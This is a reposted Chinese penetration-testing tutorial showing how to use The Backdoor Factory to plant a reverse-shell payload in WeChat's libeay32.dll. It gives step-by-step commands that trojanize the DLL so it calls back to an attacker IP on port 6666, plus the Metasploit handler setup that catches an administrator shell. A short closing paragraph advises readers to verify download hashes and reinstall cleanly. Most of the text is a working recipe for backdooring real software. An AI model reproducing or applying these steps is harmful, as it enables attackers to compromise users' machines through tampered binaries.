2019-10-9:滲透測試,基礎學習the-backdoor-factory-master(后門工廠)初接觸


該文章僅供學習,利用方法來自網絡文章,僅供參考

the-backdoor-factory-master(后門工制造廠)原理:可執行二進制文件中有大量的00,這些00是不包含數據的,將這些數據替換成payload,並且在程序執行的時候,jmp到代碼段,來觸發payload。

測試靶機環境,win7系統,wechat(微信)2.6.8

靶機ip:192.168.190.129

目標:利用the-backdoor-factory-master對微信自己的dll動態連接文件植入后門,等微信運行之后,反彈shell到攻擊機

1,靶機安裝微信,記錄下安裝路徑

2,使用Process Explorer進程管理器,找到微信進程,查看微信運行所需要的dll文件,找到微信安裝路徑下的任意一個文件,本次實驗將利用libeay32.dll文件

3,將文件復制到kali下任意目錄,我直接復制到the-backdoor-factory-master下方便使用

4,運行the-backdoor-factory-master,輸入命令,./backdoor.py -f libeay32.dll,查找可利用的pyload,可以看到檢測到了,有不少可植入的pyload

5,因為這次目的是獲得shell,所以選擇使用reverse_shell_tcp_lnline這個pyload,輸入命令./backdoor.py -f libeay32.dll  -s reverse_shell_tcp_inline -P 6666 -H 192.168.190.134,

-P,指定端口

-H,指定反彈shell的攻擊機ip地址

6,命令執行成功,會列出可植入后門的位置,這里植入位置,我選擇4,data數據位置

7,植入完成,會將生成的有后門的文件,會存在工具自帶的backdoored目錄下,生成一個同名的dll文件

9,將生成的有后門的文件,放在靶機的微信安裝目錄下,會發現新生成的文件大小,跟默認自帶的大小不一樣

 

10,打開kali的postgresql數據庫服務,之后運行msf,來監聽反彈的shell

輸入命令,server postgresql start

輸入命令,msfconsole,啟動msf滲透測試框架

11,輸入命令,use exploit/multi/handler,進入到handler

輸入命令 set payload windows/shell_reverse_tcp,設置利用windows系統下的shell_reverse_tcp腳本

輸入命令,show options,顯示利用腳本需要設置的信息

12,輸入命令 ,set lhost 192.168.190.134,設置監聽的主機

輸入命令,set lport 6666,設置監聽的端口

13,輸入命令exploit開始執行腳本

14,打開靶機,運行微信,微信會提示dll文件缺失,重新運行安裝微信,會提示已經安裝,點擊確定覆蓋安裝

15,覆蓋安裝完成,運行微信,發現后門已經成功執行,成功反彈出來了,這個有后門的微信機器的shell

16,可以執行任意的windows系統命令,比如,whoami,發現是個administrator用戶

 

總結,the-backdoor-factory-master是個強大且方便的后門植入工具,提供的腳本生成檢測,后門植入方法使用很簡單,請廣大網友下載使用軟件時候一定要在官網下載,有能力的話下載的文件就看官網提供的md5等hash值跟自己下載的軟件程序的hase值進行對比,確定程序沒有修改再安裝,如果突然發現自己的程序運行提示有報錯,缺少文件一類的,請務必將之前的程序卸載干凈,刪除殘留文件,清理無效注冊表之后再安裝,不要只是點擊覆蓋安裝


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM